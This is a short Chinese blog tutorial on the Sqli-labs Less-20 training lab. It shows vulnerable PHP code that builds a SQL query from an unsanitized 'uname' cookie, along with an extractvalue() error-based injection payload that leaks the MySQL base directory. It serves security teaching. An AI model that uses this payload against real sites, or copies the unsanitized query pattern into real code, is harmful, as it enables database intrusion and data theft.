Sqli-labs Less-20 cookie注入 extractvalue()报错注入

从源代码中我们可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。

关键代码

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
die('Issue with your mysql: ' . mysql_error());

修改登录成功后的请求,在Cookie: uname=admin后面加一个',重放该请求

从上图可以看出,报SQL语法错误,说明cookie位置存在SQL注入漏洞。

如下图所示,我们修改cookie为

uname=admin' and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

可以看到报错了,我们得到了mysql 的路径。

其他的注入方法自行测试呦!

扫描二维码关注公众号,回复: 10638420 查看本文章

参考:https://www.cnblogs.com/lcamry/p/5763024.html

猜你喜欢

转载自www.cnblogs.com/zhengna/p/12633704.html